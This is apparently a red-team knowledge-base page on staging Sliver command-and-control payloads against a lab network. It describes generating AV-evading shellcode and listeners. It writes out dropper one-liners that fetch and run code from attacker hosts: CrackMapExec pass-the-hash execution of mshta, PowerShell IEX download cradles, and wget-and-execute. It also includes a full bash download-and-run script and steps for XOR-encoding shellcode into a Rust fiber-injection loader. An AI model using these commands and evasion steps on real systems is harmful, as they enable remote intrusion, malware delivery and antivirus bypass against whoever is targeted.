Malleum Knowledge Base

0. Resource Development (TA0042)

2 min read

πŸ” Run Automation

/opt/sliver/automation.sh

🧩 Script Actions Summary:

  1. Creates 3 Sliver profiles:

    • General Windows payload

    • Fiber injection shellcode (for AV evasion)

    • Linux binary payload

  2. Generates Payloads:

    • Windows shellcode

    • Linux binary

    • Fiber injection shellcode

  3. Starts Listeners:

    • General stager listener on 8443

    • HTTPS listener on 443

    • mTLS listener for fiber payload on 4443

  4. Creates C# Shellcode:

    • Via msfvenom, fetches Stage 2 from the Sliver stager

  5. Generates Droppers:

    • Powershell dropper (dropper.txt)

    • .xml and .hta variants to bypass Constrained Language Mode

πŸ“¦ Dropper Execution Methods

Use any of the following to trigger your payload remotely:

1. With CrackMapExec (CME)

cme smb <TargetIP> -u 'Administrator' -H <NTLM Hash> --local-auth -x "C:\\Windows\\System32\\mshta.exe http://10.10.15.154/sharp_new.hta"

2. Using mshta

mshta.exe http://10.10.15.154/sharp_new.hta

3. Using Powershell (various encodings/escaping)

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.15.154/sharp.ps1')"
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.154/sharp.ps1') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.15.154/sharp.ps1%27)%22

4. Linux Dropper (Wget Method)

wget http://10.10.15.154/bad.sh -O /tmp/bad.sh && sh /tmp/bad.sh
  • I need to edit the automation scirpt to make bad.sh works properly.
#!/bin/bash

# Define the URL and local file name
URL="http://10.8.2.41/bad"
FILE_NAME="downloaded_binary"

# Download the file
curl -o $FILE_NAME $URL

# Check if the download was successful
if [ -f "$FILE_NAME" ]; then
    echo "Download successful."

    # Make the file executable
    chmod +x $FILE_NAME

    # Execute the file
    echo "Executing the file..."
    ./$FILE_NAME
else
    echo "Failed to download the file."
fi

πŸ” Fiber Injection Payload Compilation Steps

  1. XOR Encode Shellcode
smart_xor_encoder shellcode.bin

  • Produces: encoded_shellcode.bin

  • Example XOR key used: 0x78

  1. Transfer to Development Windows Environment
mv encoded_shellcode.bin /media/sf_shared
  1. Integrate into Rust Project

  • Move to src/ folder of fiber injection project

  • Update the XOR key in source code

  1. Build Executable
cargo build --release

It will create an executable, that you could use if the general methods doesn’t works.

🌐 Network Range

10.10.110.0/24

Graph View